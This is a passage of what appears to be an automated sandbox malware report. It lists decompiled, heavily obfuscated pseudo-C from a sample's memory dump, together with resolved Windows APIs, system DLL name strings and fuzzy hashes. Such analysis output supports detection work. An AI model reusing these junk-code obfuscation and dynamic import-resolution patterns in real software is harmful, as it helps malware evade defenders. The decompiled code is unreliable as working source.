0x0047a817
0x0047a828
0x0047a83e
0x0047a84a
0x0047a856
0x0047a859
0x0047a85b
0x0047a85b
0x0047a861
0x0047a868
0x0047a86f
0x0047a876
0x0047a87c
0x0047a886
0x0047a895
0x0047a89e
0x0047a8b8
0x0047a8c0
0x0047a8e5
0x0047a8e5
0x00000000
0x0047a8c2
0x0047a8cc
0x0047a8d2
0x0047a8d6
0x0047a8e3
0x0047a8eb
0x0047a8eb
0x0047a905
0x0047a908
0x0047a913
0x0047a91e
0x0047a920
0x0047a920
0x0047a92c
0x0047a938
0x0047a93a
0x0047a944
0x0047a94b
0x0047a953
0x0047a953
0x0047a959
0x0047a95a
0x0047a95f
0x0047a962
0x0047a96a
0x0047a970
0x0047a978
0x0047a97f
0x0047a982
0x0047a985
0x0047a994
0x0047a99c
0x0047a9a1
0x0047a9c0
0x0047a9ce
0x0047a9d4
0x0047a9e3
0x0047a9e7
0x0047a9ed
0x0047a9f1
0x0047a9fb
0x0047a9fc
0x0047aa05
0x0047aa0e
0x0047aa1e
0x0047aa25
0x0047aa2f
0x0047aa31
0x0047aa31
0x0047aa39
0x00000000
0x0047aa3b
0x0047aa43
0x00000000
0x0047aa49
0x0047aa10
0x0047aa10
0x0047aa18
0x0047aa5c
0x0047aa5f
0x0047aa5f
0x0047aa6f
0x0047aa76
0x0047aa9a
0x0047aa9f
0x0047aaa5
0x0047aaab
0x0047aab4
0x0047aab6
0x0047aab7
0x0047aac1
0x0047aac1
0x0047aa1c
0x0047aa4b
0x0047aa4b
0x0047aa53
0x00000000
0x00000000
0x0047aa53
0x00000000
0x0047aa1c
0x0047aa0e
0x00000000
0x0047a8e3

APIs

GetProcAddress.KERNEL32(?,?), ref: 0047AA88

Strings

PortableDeviceWMDRM.dll, xrefs: 0047A9C0
CreateActCtxW, xrefs: 0047A90B
0oy, xrefs: 0047AA6F
sspicli.dll, xrefs: 0047AA61
TpWaitForAlpcCompletion, xrefs: 0047A845
user.exe, xrefs: 0047A9FF
RegQueryInfoKeyW, xrefs: 0047A84F

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: 0oy$CreateActCtxW$PortableDeviceWMDRM.dll$RegQueryInfoKeyW$TpWaitForAlpcCompletion$sspicli.dll$user.exe
API String ID: 190572456-2211268516
Opcode ID: ac7239bff0f17f5a8bb7015810b213fe47341ce947cce81556564d88e14949ab
Instruction ID: 0912d728c7e4097cf6879aa5361fcc13a19d4d64aeec223f8342f31c29af41fd
Opcode Fuzzy Hash: ac7239bff0f17f5a8bb7015810b213fe47341ce947cce81556564d88e14949ab
Instruction Fuzzy Hash: 8E610365E042459FCB00EF78EC942ED7BB2EF6A314B44817BCA08D7326E2340669C75D

Uniqueness

Uniqueness Score: -1.00%

Function 004A0DFA Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 172COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004A100D

Strings

psapi.dll, xrefs: 004A0F2B
sqlsrv32.dll, xrefs: 004A0F06
sspicli.dll, xrefs: 004A0E3E
deskperf.dll, xrefs: 004A0F4F
EhStorAuthn.exe, xrefs: 004A0ED0
msobjs.dll, xrefs: 004A103F
disrvpp.dll, xrefs: 004A0EF0

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: FileModuleName
String ID: EhStorAuthn.exe$deskperf.dll$disrvpp.dll$msobjs.dll$psapi.dll$sqlsrv32.dll$sspicli.dll
API String ID: 514040917-2845219219
Opcode ID: 83dc9f3b863139432aca390bd8e43a277fa21bb3793fb1c54211bd05395f414e
Instruction ID: caf2b4fb9c789d843a588bb7d515dd6bba945a7d06ed732cbcc83bea5fd745e1
Opcode Fuzzy Hash: 83dc9f3b863139432aca390bd8e43a277fa21bb3793fb1c54211bd05395f414e
Instruction Fuzzy Hash: 9161CC74E142468FCB009FB8E8842EE7BB1EF2A310F44417BD550AB365E3784A85C79D

Uniqueness

Uniqueness Score: -1.00%

Function 004DF0D9 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004DF0D9(void* __ebx) {
				unsigned short _t59;
				unsigned short _t61;
				unsigned short _t64;
				unsigned short _t78;
				unsigned short _t87;
				char* _t107;
				unsigned short _t111;
				signed int _t124;
				char* _t128;
				signed char _t138;
				signed char _t140;
				signed int _t141;
				signed int _t153;
				void* _t160;
				signed short _t163;
				intOrPtr _t166;
				short _t168;
				void* _t172;
				void* _t176;
				void* _t180;

				_t107 = "mtxclu.dll";
				_t59 =  *(_t180 - 8);
				_t138 =  *(_t180 - 0x20);
				if(_t59 <=  *((intOrPtr*)(_t138 + 0x14))) {
					 *(_t180 - 8) = _t59;
					_t61 =  *(_t180 - 8);
					_t111 =  *(_t180 - 0x14) - 0x44 >> _t138;
					_t140 =  *0x4fd156; // 0x7d00
					if(_t140 <= _t140) {
						 *0x4fd1a0 =  *0x4fd1a0 - _t160;
					}
					_t163 = 0xa1bf;
					 *(_t180 - 8) = _t61;
					 *0x4fd60b = _t61;
					_t64 =  *(_t180 - 0x58);
					 *(_t180 - 8) = _t64;
					if(_t64 >> _t140 < 0x26ba) {
						L12:
						_t163 =  !_t163;
						 *0x4fd212 = _t163;
						goto L13;
					} else {
						_t111 = "sspicli.dll" + "sspicli.dll";
						 *0x4fd178 =  *0x4fd178 + 0x65ce;
						if(0x813a < 0) {
							L13:
							 *0x4fff1d = 0xc0;
							if("speechuxcpl.dll" == 0x10) {
							}
							 *(_t180 - 0x10) = _t111;
							 *(_t180 - 0x14) = _t111;
							_t141 =  *(_t180 - 0x6c);
							 *(_t180 - 0x20) = _t141;
							 *0x4fd152 = _t141;
							_t78 =  *(_t180 - 8);
							 *0x4fff1d = _t78;
							 *(_t180 - 8) = _t78;
							 *(_t180 - 0x20) =  *( *(_t180 - 0x20) + 0x1c);
							E004BAA47(0xef,  !( *( *(_t180 - 0x20) + 0x1c)) - 0x69df91, _t163, 0,  !(_t176 - 1), _t163, _t163, 0);
							 *0x4fd1c8 =  *0x4fd1c8 + _t163;
							if((_t163 & 0x00009595) == 0) {
								 *0x4ff4e7 =  *0x4ff4e7 - 0xb51f;
							}
							_push(E004DF3BD);
							goto __eax;
						}
						goto L12;
					}
				}
				 *(_t180 - 8) = _t59;
				 *0x4fd64b = _t59;
				 *0x4fd0aa =  *0x4fd0aa - _t107;
				 *((intOrPtr*)(_t180 - 0x18)) =  *((intOrPtr*)(_t180 - 0x18)) - _t107;
				_t124 =  *(_t180 - 0x20);
				if(_t138 >= _t138) {
					 *0x4fd160 = _t138;
				}
				_t166 =  *0x4fd1ac; // 0x6d46
				 *(_t180 - 0x20) = _t138;
				E004D8683(_t166, _t172, _t138);
				_t87 =  *(_t180 - 8);
				 *(_t180 - 8) = _t87;
				if(_t87 != 0x19) {
					 *(_t180 - 0x1c) =  !(_t124 - 1);
					 *0x4fd180 = 0x5fa2;
				}
				_t153 =  *(_t180 - 0x20);
				_push(0x7f);
				_t168 =  *0x4fd1d0; // 0x7e6
				_t128 = "RegQueryInfoKeyW";
				if(_t128 < _t128) {
					_t128 = _t128 - 0x4b1c;
					 *0x4fd156 = _t153;
					_t168 =  *0x4fd18a; // 0x6341
				}
				 *0x4fd1ee = _t168;
				 *(_t180 - 0x20) = _t153;
				E004A3550(_t128, _t153, _t172, _t176, 0, _t153, _t153);
				 *0x4fd1a2 = _t168 + _t168;
				SetLastError(??);
				return 0;
			}

0x004df0e9
0x004df0ee
0x004df0f1
0x004df0f7
0x004df239
0x004df249
0x004df24c
0x004df251
0x004df25a
0x004df25c
0x004df25c
0x004df271
0x004df275
0x004df278
0x004df283
0x004df286
0x004df290
0x004df2b7
0x004df2b7
0x004df2b9
0x00000000
0x004df292
0x004df298
0x004df2a7
0x004df2b5
0x004df2c0
0x004df2c8
0x004df2dc
0x004df2dc
0x004df2e3
0x004df2e6
0x004df2f5
0x004df2f8
0x004df2fb
0x004df344
0x004df356
0x004df363
0x004df36b
0x004df37d
0x004df382
0x004df38e
0x004df39b
0x004df3af
0x004df3b1
0x004df3bb
0x004df3bb
0x00000000
0x004df2b5
0x004df290
0x004df0fd
0x004df100
0x004df108
0x004df10f
0x004df114
0x004df119
0x004df11b
0x004df11b
0x004df129
0x004df130
0x004df134
0x004df139
0x004df142
0x004df147
0x004df14f
0x004df158
0x004df158
0x004df174
0x004df177
0x004df17c
0x004df18c
0x004df193
0x004df19a
0x004df19b
0x004df1a5
0x004df1a5
0x004df1ac
0x004df1b7
0x004df1be
0x004df1cd
0x004df1dd
0x004df761

APIs

SetLastError.KERNEL32(0000007F), ref: 004DF1DD

Strings

msmpeg2adec.dll, xrefs: 004DF23C, 004DF33F
speechuxcpl.dll, xrefs: 004DF2D5
CNHI06S.DLL, xrefs: 004DF0D9
sspicli.dll, xrefs: 004DF293
0Lqt, xrefs: 004DF1DD
mtxclu.dll, xrefs: 004DF0E9
RegQueryInfoKeyW, xrefs: 004DF18C
disrvpp.dll, xrefs: 004DF308

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: ErrorLast
String ID: 0Lqt$CNHI06S.DLL$RegQueryInfoKeyW$disrvpp.dll$msmpeg2adec.dll$mtxclu.dll$speechuxcpl.dll$sspicli.dll
API String ID: 1452528299-262261011
Opcode ID: c21466f2d5b0bcfe843aec650c588c62d68f5def18c39c63d442d7677944865c
Instruction ID: cd646df26581a3b033371a2c884999cce0034dfaa967471791fe0829ff075843
Opcode Fuzzy Hash: c21466f2d5b0bcfe843aec650c588c62d68f5def18c39c63d442d7677944865c
Instruction Fuzzy Hash: E971AAB8E102099FCB00EFB8D9946EDBBB2FB29314F40417AD845E7315E3389985CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00497722 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 270
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00497722(short __ecx, void* __edx, unsigned short __edi, void* __esi) {
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t52;
				char _t61;
				intOrPtr _t64;
				char _t68;
				intOrPtr _t74;
				signed int _t101;
				void* _t103;
				intOrPtr _t110;
				short _t118;
				signed int _t119;
				signed char _t127;
				intOrPtr _t128;
				signed char _t132;
				signed char _t136;
				short _t138;
				char* _t139;
				void* _t141;
				short _t144;
				void* _t149;
				unsigned short _t161;
				void* _t164;
				void* _t171;
				unsigned short _t172;
				unsigned short _t173;
				void* _t174;
				void* _t175;

				_t161 = __edi;
				_t141 = __edx;
				_t118 = __ecx;
				_t43 =  *((intOrPtr*)(_t175 - 8));
				_push( *((intOrPtr*)(_t175 - 0x20)));
				if(0x9f7d6 >= 0x9f7d6) {
					 *0x4fd13a = __ecx;
				}
				_t119 = _t118 - 0x7a8a;
				 *0x4fe937 =  *0x4fe937 + _t141 + 1;
				_t144 =  *0x4fd222; // 0xa1b3
				 *0x4fff1b = _t43;
				 *((intOrPtr*)(_t175 - 8)) = _t43;
				_t45 =  *((intOrPtr*)(_t175 - 8));
				_push( *0x4fd533);
				if(0x9f7d6 > 0x9f7d6) {
					if(_t119 <= _t119) {
						 *0x4fff16 =  *0x4fff16 + _t119;
					}
					_t119 = _t119 ^ 0x000074bf;
				}
				 *0x4fd1f6 = _t144;
				_t171 = 0xffffffffffff444c;
				 *0x4fd2dd =  *0x4fd2dd - 0xffffffffffff444c;
				 *0x4fff1b = _t45;
				 *((intOrPtr*)(_t175 - 8)) = GetProcAddress(??, ??);
				 *0x4fff14 =  *0x4fff14 + 0x32027d;
				 *0x4fde1f = 0x32027d;
				 *0x4fd164 =  *0x4fd164 + 0x6711;
				_t47 =  *((intOrPtr*)(_t175 - 8));
				 *((intOrPtr*)(_t175 - 8)) = _t47;
				if(_t47 == 0x31) {
				}
				_t48 =  *((intOrPtr*)(_t175 - 8));
				 *0x4fe52b = _t48;
				if(0x90 >= 0) {
					_t171 = _t171 + 0xac18a1;
					_t110 = 0xd3;
					if(_t161 >> 0 < 0) {
						 *0x4fd4ab = _t48;
						_t110 =  *0x4fd787;
						 *0x4fff12 =  *0x4fff12 - _t48;
					}
					 *0x4fd0a2 =  *0x4fd0a2 + _t110;
					 *0x4fd138 = 0;
					 *0x4fd156 = 0;
				}
				_t127 =  *0x4fd188; // 0x647c
				 *0x4fd1d2 = 0x91;
				 *0x4fff19 =  *0x4fff19 - _t48;
				 *0x4ff647 =  *0x4ff647 - _t171;
				_push(0);
				 *((intOrPtr*)(_t175 - 8)) = _t48;
				_t128 =  *0x4fd10c; // 0x551c
				_t132 = (_t128 - 0x5a0d23 >> _t128 - 0x5a0d23) + (_t128 - 0x5a0d23 >> _t128 - 0x5a0d23) + (_t128 - 0x5a0d23 >> _t128 - 0x5a0d23) + (_t128 - 0x5a0d23 >> _t128 - 0x5a0d23);
				_t149 = 0xffffffffff68ba1b;
				if(0xb4 >> _t127 > 0x297d33) {
					L17:
					_t149 = 0xa486;
					 *0x4fd22a =  *0x4fd22a + _t171;
					 *0x4fee3b =  *0x4fee3b - _t171;
				} else {
					 *0x4fd0f6 =  *0x4fd0f6 - 0x4ffecb;
					_t132 = _t132 + _t132;
					if(_t132 > _t132) {
						goto L17;
					} else {
						if(_t132 == _t132) {
							_t132 = 0x7d1a;
						}
						if((_t132 & 0x00000087) >= 0) {
							goto L17;
						}
					}
				}
				_t172 = _t171 + 0xd3d5;
				_t52 =  *((intOrPtr*)(_t175 - 8));
				_push( *0x4fd0b0);
				 *((intOrPtr*)(_t175 - 8)) = _t52;
				if(0xf0 >> _t132 != 0xf0 >> _t132) {
					 *0x4fd132 = _t132;
					_t132 =  *0x4fd180; // 0x4a7e
					 *0x4fe793 =  *0x4fe793 - _t149;
					 *0x4fff17 =  *0x4fff17 + _t149;
					_t149 = 0xa69d;
					_t52 = 0xffffffffffffff47;
				}
				 *0x4fff1b = _t52;
				_t136 = (0x7078 >> 0x7078) + _t149;
				L0045F504( *((intOrPtr*)(_t175 - 8)) - 0x32, "ehshell.dll" >> _t132, _t136, _t149, 0x4ffbe0, _t172, _t149, _t149, _t149);
				_t173 = _t172 >> _t136;
				 *0x4fdc7b = 0x2f1c6e;
				_push( *0x4fd0e8);
				 *0x4fddf3 = "deskperf.dll";
				_t138 = _t136 + 0xcbd9;
				 *0x4fd17c = _t138;
				L00460BDB( *((intOrPtr*)(_t175 - 8)), _t138, _t138, _t138);
				_t154 =  !0x953b;
				_t61 =  *((intOrPtr*)(_t175 - 8));
				_push( *0x4fd0d4);
				 *0x4fff1b =  *0x4fff1b + _t61;
				_t164 = 0x4ffbe0;
				 *0x4fff1e = _t61;
				 *((intOrPtr*)(_t175 - 8)) = _t61;
				 *((intOrPtr*)(_t175 - 0xc)) = _t61 - 0x41;
				_t139 = _t138 - 0x563736;
				 *((intOrPtr*)(_t175 - 0x10)) =  *((intOrPtr*)(_t175 - 0x10)) - _t139;
				 *0x4fdc17 = "RegQueryInfoKeyW";
				_t64 = L00461400( *((intOrPtr*)(_t175 - 8)), 0x490290, _t139,  !0x953b, 0x4ffbe0, _t173, _t139);
				if(_t139 > _t139) {
					_t139 =  &(_t139[0x6c5ddb]);
					_t154 = 0xba5af7;
					if(0x903b <= 0) {
						_t154 = 0x1e27e87;
						_t173 = _t173 - 0x9dddab;
						 *0x4fff1b = _t64;
						goto L23;
					}
				}
				 *0x4ffc40 =  *0x4ffc40 + _t164;
				_push( *0x4fd0ba);
				_t174 = _t173 - 0xc8b7;
				_t68 =  *((intOrPtr*)(_t175 - 8));
				_t99 =  *((intOrPtr*)(_t175 - 0xc));
				 *((intOrPtr*)(_t175 - 8)) = _t68;
				if(_t99 <= 0x2d1e) {
					L32:
					 *0x4fff1d = _t68;
					goto L33;
				} else {
					_t99 = 0x4fff12;
					if(0x4fff12 <= 0x4fff12) {
						_t99 = 0x4fff12;
						_t139 = "CNBBR334.DLL";
					}
					if(_t139 != _t139) {
						L30:
						if(_t174 >= 0) {
							_t68 =  *0x4fff1b; // 0x0
							goto L32;
						}
						L33:
						_t101 =  !(_t99 + 1);
					} else {
						_t139 =  &(_t139[0x681b37]);
						if(_t139 >= _t139) {
							 *0x4fd1a6 = _t154;
							 *0x4fff19 = _t68;
							goto L30;
						}
					}
				}
				_t74 =  *((intOrPtr*)(_t175 - 8));
				_push( *0x4fd002);
				 *((intOrPtr*)(_t175 - 8)) = _t74;
				_t103 = _t101 + 0x4ebe - 0x2b4680;
				 *0x4fd0cc =  *0x4fd0cc + _t103;
				 *0x4fff14 =  *0x4fff14 + _t103;
				_push(0);
				_push(_t139);
				_push(_t139);
				_push(0x497b3f);
				_push(L0045F504);
				return _t74;
			}

0x00497722
0x00497722
0x00497722
0x00497722
0x0049772a
0x0049772f
0x00497731
0x00497731
0x0049773b
0x00497741
0x0049774d
0x00497755
0x0049775b
0x00497760
0x00497763
0x0049776c
0x00497771
0x00497773
0x00497773
0x00497779
0x00497779
0x00497785
0x00497791
0x00497796
0x0049779d
0x004977b3
0x004977bb
0x004977c1
0x004977d4
0x004977e3
0x004977e6
0x004977eb
0x004977eb
0x004977f7
0x00497800
0x0049780b
0x00497813
0x00497819
0x00497821
0x00497828
0x0049782f
0x00497835
0x00497835
0x0049783b
0x0049784e
0x00497855
0x00497855
0x0049785f
0x00497866
0x00497877
0x0049787d
0x00497883
0x00497885
0x00497895
0x004978a8
0x004978aa
0x004978b8
0x004978e2
0x004978e2
0x004978e6
0x004978ed
0x004978ba
0x004978c3
0x004978ca
0x004978cf
0x00000000
0x004978d1
0x004978d4
0x004978d6
0x004978d6
0x004978dd
0x00000000
0x00000000
0x004978dd
0x004978cf
0x004978f5
0x004978fa
0x004978fd
0x0049790c
0x00497914
0x0049791e
0x0049792f
0x00497936
0x0049793c
0x00497944
0x00497948
0x00497948
0x0049794b
0x0049797b
0x00497980
0x0049798d
0x004979a3
0x004979af
0x004979c4
0x004979d1
0x004979d6
0x004979e0
0x004979ee
0x004979f0
0x004979f3
0x004979fa
0x00497a07
0x00497a08
0x00497a0f
0x00497a1a
0x00497a22
0x00497a28
0x00497a33
0x00497a42
0x00497a49
0x00497a4e
0x00497a54
0x00497a5e
0x00497a62
0x00497a68
0x00497a6e
0x00000000
0x00497a6e
0x00497a5e
0x00497a79
0x00497a84
0x00497a8b
0x00497a98
0x00497aa0
0x00497aa3
0x00497aab
0x00497af3
0x00497af3
0x00000000
0x00497aad
0x00497aad
0x00497ab6
0x00497ab8
0x00497aba
0x00497aba
0x00497ac1
0x00497ae8
0x00497aeb
0x00497aed
0x00000000
0x00497aed
0x00497afa
0x00497b05
0x00497ac3
0x00497ac3
0x00497acb
0x00497acd
0x00497ae2
0x00000000
0x00497ae2
0x00497acb
0x00497ac1
0x00497b09
0x00497b0c
0x00497b18
0x00497b1b
0x00497b21
0x00497b28
0x00497b30
0x00497b32
0x00497b33
0x00497b34
0x00497b39
0x00497b3e

APIs

GetProcAddress.KERNEL32(?), ref: 004977A6

Strings

3}), xrefs: 004978B2
ehshell.dll, xrefs: 00497964
deskperf.dll, xrefs: 004979BF
CNBBR334.DLL, xrefs: 00497ABA
Microsoft.Build.Engine.dll, xrefs: 00497AFC
RegQueryInfoKeyW, xrefs: 00497A2E

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: 3})$CNBBR334.DLL$Microsoft.Build.Engine.dll$RegQueryInfoKeyW$deskperf.dll$ehshell.dll
API String ID: 190572456-1586005962
Opcode ID: dd090d31c08a8a234200a4cf73bf9e69e1585ccc3349eee4e6c0b1e208f04375
Instruction ID: 177750f62930e81e1ecf5c919091648b7d8a426c8df44522bebd456c5d60d365
Opcode Fuzzy Hash: dd090d31c08a8a234200a4cf73bf9e69e1585ccc3349eee4e6c0b1e208f04375
Instruction Fuzzy Hash: DAA1F065E583459FCB00EFB8EC945E97FB2EF2A324B04407BC94597722E2780A55C76C

Uniqueness

Uniqueness Score: -1.00%

Function 004CD9F5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 260
networkCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004CD9F5(char __eax, signed int __ecx, void* __edx, signed int __edi, void* __esi) {
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t40;
				int _t43;
				void* _t46;
				void* _t51;
				char _t57;
				intOrPtr _t58;
				intOrPtr _t64;
				intOrPtr _t66;
				char _t67;
				intOrPtr _t70;
				intOrPtr _t76;
				intOrPtr _t81;
				char* _t97;
				intOrPtr _t102;
				unsigned short _t104;
				signed char _t127;
				unsigned short _t133;
				intOrPtr _t137;
				short _t138;
				short _t143;
				intOrPtr _t157;
				unsigned short _t165;
				unsigned short _t166;
				signed short _t167;
				void* _t168;
				void* _t170;
				void* _t173;
				signed short _t174;
				void* _t178;

				_t163 = __edi;
				_t124 = __ecx;
				_push(__eax);
				 *0x4fff1e = __eax;
				_pop(_t38);
				 *((intOrPtr*)(_t178 - 8)) = _t38;
				_t137 =  *0x4fd1f2; // 0x19fd
				_t39 =  *((intOrPtr*)(_t178 - 8));
				_t76 =  *0x4fda43; // 0x0
				 *0x4fdc97 =  *0x4fdc97 - _t76;
				if(_t39 != 1) {
					_t127 = __ecx + __ecx + 1;
					_t138 =  *0x4fd20a; // 0x178
					_t40 = _t39;
					_push( *((intOrPtr*)(_t178 - 0x14)));
					_t165 = (__edi ^ 0x00d185d2) - 0xdfaa56;
					 *0x4fd503 = _t40;
					 *0x4fd1da = _t138;
					_t43 = InternetCloseHandle(_t40);
					 *0x4fd6ff =  *0x4fd6ff - _t165;
					_t81 = _t43 + _t43;
					_t170 = __esi + 0xb4d7a7;
					 *0x4fff1d =  *0x4fff1d - _t43;
					_t166 = _t165 >> _t127;
					_t46 = _t43;
					 *0x4fd1f4 = 0x937d;
					if(_t46 == 0x2327d6) {
						_t81 = 0x385e9c;
						 *0x4fddff = 0x385e9c;
					}
					_push(_t46);
					 *0x4fd20a = 0x126fa;
					E004B66B8(_t46, _t81, _t127 - 0x5bb9e7, 0x126fa, _t166, _t170 + _t170, 1);
					_push( *((intOrPtr*)(_t178 - 0x10)));
					_push(0x4ce58f);
					goto ( *0x4fe9ff);
				}
				_t143 = _t137 + 0x92b9;
				_push(_t39);
				_push(1);
				L0045F957(_t39, __esi);
				_t51 = 1;
				if(_t51 != 0) {
					L4:
					_t143 =  *0x4fd1ac; // 0x6d46
					L5:
					 *0x4fd1f8 = _t143;
					_t173 = 0xa226c7;
					 *((intOrPtr*)(_t178 - 8)) = _t178 - 0x38;
					if(0 < 0) {
						 *0x4fff1b =  *0x4fff1b;
					}
					 *0x4fff10 = 0xfe;
					_t57 =  *((intOrPtr*)(_t178 - 8));
					 *((intOrPtr*)(_t178 - 0x20c8)) = _t57;
					if(_t124 == _t124) {
						 *0x4fd1b4 = 0xffffffffff6d8d46;
					}
					if(0x8424 == 0) {
						 *0x4fd24c =  *0x4fd24c - _t173;
					}
					if(_t173 < 0) {
						_t163 =  !_t163;
						 *0x4fff1e = _t57;
					}
					 *((intOrPtr*)(_t178 - 8)) = _t57;
					_t58 =  *((intOrPtr*)(_t178 - 8));
					 *0x4fd593 = _t58;
					_push( *((intOrPtr*)(_t178 - 0x20c8)));
					_t167 = _t163 + _t163;
					if(_t58 >= 0x131463) {
						_t133 = _t124 + _t124;
						if(_t133 <= _t133) {
							_t133 = _t133 >> _t133;
						}
						_t173 = 0;
						 *0x4fff1d =  *0x4fff1d - _t58;
						 *0x4fff1d =  *0x4fff1d - _t58;
						if(_t167 < 0) {
							if(_t58 >= 0) {
								_t167 = _t167 + 0x5dfbe;
							}
							_t133 = 0x53a896;
						}
						 *0x4fff15 =  *0x4fff15 + _t133;
						_t124 =  *0x4fd190; // 0xb97d
						 *0x4fd1de = 0x8c95;
					}
					 *0x4ff6af =  *0x4ff6af + _t173;
					_t174 = _t167;
					_t168 = _t173;
					 *0x4fde73 = 0x3b1f0a;
					 *((intOrPtr*)(_t178 - 0x20c8)) = 0x1ff5;
					 *((intOrPtr*)(_t178 - 8)) = 0x1ff5;
					_t97 =  *0x4fd843; // 0x74714340
					if((_t174 & 0x0000b077) < 0) {
						L24:
						 *0x4fdb1f = _t97;
						_t97 = "PortableDeviceWMDRM.dll";
						 *0x4fd13a = _t124;
						goto L25;
					} else {
						 *0x4fd2ed =  *0x4fd2ed + _t174;
						if(_t174 >= 0) {
							L25:
							 *0x4fd1bc = 0xb158;
							_t64 =  *((intOrPtr*)(_t178 - 8));
							_push( *((intOrPtr*)(_t178 - 0x20c8)));
							 *0x4fff18 =  *0x4fff18;
							 *((intOrPtr*)(_t178 - 0xc)) = _t64;
							 *0x4ff900 =  *0x4ff900 - _t168;
							 *0x4fd547 = _t64;
							_push( *((intOrPtr*)(_t178 - 0xc)));
							_pop(_t66);
							 *0x4fd228 = _t174 + 1;
							 *((intOrPtr*)(_t178 - 8)) = _t66;
							_t67 =  *((intOrPtr*)(_t178 - 8));
							_t102 =  *0x4fd763; // 0x19da2c
							_t104 = _t102 - 0x2a16 >> 0x7acf;
							_push(_t67);
							_t157 =  *0x4fd220; // 0xed5d
							 *0x4fff1b = _t67;
							 *0x4fdc8f = _t104;
							 *0x4fddb7 = _t104;
							 *((intOrPtr*)(_t178 - 8)) = _t178 - 0x202d;
							 *0x4fff17 =  *0x4fff17;
							 *0x4fe9cb =  *0x4fe9cb - _t157;
							_t70 =  *((intOrPtr*)(_t178 - 8));
							_push(_t70);
							 *0x4fd5bb = _t70;
							_push(_t70);
							_push(_t70);
							_push(E004CDD04);
							_push(E004A93CB);
							return _t70;
						}
						goto L24;
					}
				}
				_t163 = __edi;
				if("deskperf.dll" < "deskperf.dll") {
					goto L5;
				}
				 *0x4fd146 =  *0x4fd146 + __ecx;
				_t124 =  !__ecx;
				goto L4;
			}

0x004cd9f5
0x004cd9f5
0x004cd9f8
0x004cd9f9
0x004cda09
0x004cda11
0x004cda17
0x004cda1e
0x004cda25
0x004cda2b
0x004cda36
0x004ce4c4
0x004ce4c8
0x004ce4d5
0x004ce4d6
0x004ce4e0
0x004ce4e6
0x004ce4ef
0x004ce4ff
0x004ce50e
0x004ce515
0x004ce51a
0x004ce520
0x004ce526
0x004ce531
0x004ce536
0x004ce545
0x004ce547
0x004ce54c
0x004ce54c
0x004ce55a
0x004ce55b
0x004ce566
0x004ce576
0x004ce57e
0x004ce589
0x004ce589
0x004cda3c
0x004cda41
0x004cda42
0x004cda46
0x004cda53
0x004cda56
0x004cda82
0x004cda82
0x004cda89
0x004cda89
0x004cda93
0x004cda9e
0x004cdaae
0x004cdab0
0x004cdab0
0x004cdabe
0x004cdac5
0x004cdac8
0x004cdad0
0x004cdad2
0x004cdad2
0x004cdae1
0x004cdae3
0x004cdae3
0x004cdaec
0x004cdaf0
0x004cdaf2
0x004cdaf2
0x004cdb0f
0x004cdb1c
0x004cdb1f
0x004cdb24
0x004cdb2a
0x004cdb34
0x004cdb44
0x004cdb48
0x004cdb4a
0x004cdb4a
0x004cdb58
0x004cdb5e
0x004cdb64
0x004cdb6d
0x004cdb71
0x004cdb73
0x004cdb79
0x004cdb90
0x004cdb90
0x004cdb95
0x004cdb9e
0x004cdba9
0x004cdbb9
0x004cdbbb
0x004cdbc1
0x004cdbc1
0x004cdbd2
0x004cdbd8
0x004cdbe2
0x004cdbef
0x004cdbfd
0x004cdc16
0x004cdc20
0x004cdc2d
0x004cdc32
0x00000000
0x004cdbff
0x004cdc05
0x004cdc0e
0x004cdc39
0x004cdc44
0x004cdc54
0x004cdc57
0x004cdc64
0x004cdc6a
0x004cdc6d
0x004cdc74
0x004cdc81
0x004cdc87
0x004cdc88
0x004cdc8f
0x004cdc97
0x004cdc9c
0x004cdca7
0x004cdcaa
0x004cdcad
0x004cdcba
0x004cdcca
0x004cdcd0
0x004cdcd6
0x004cdcd9
0x004cdcdf
0x004cdce5
0x004cdcf1
0x004cdcf2
0x004cdcf7
0x004cdcf8
0x004cdcf9
0x004cdcfe
0x004cdd03
0x004cdd03
0x00000000
0x004cdc12
0x004cdbfd
0x004cda5e
0x004cda71
0x00000000
0x00000000
0x004cda76
0x004cda7d
0x00000000

APIs

InternetCloseHandle.WININET(?), ref: 004CE4FF

Strings

PortableDeviceWMDRM.dll, xrefs: 004CDC2D
CreateActCtxW, xrefs: 004CDB82
0oy, xrefs: 004CDA76
deskperf.dll, xrefs: 004CDA69
@Cqt, xrefs: 004CDBEF
rdpwsx.dll, xrefs: 004CDB02

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: CloseHandleInternet
String ID: 0oy$@Cqt$CreateActCtxW$PortableDeviceWMDRM.dll$deskperf.dll$rdpwsx.dll
API String ID: 1081599783-2156312959
Opcode ID: ad3b46d283b7a1111ce81db4a5bc39104135c0e70693c4a7e7741c43ecff76a9
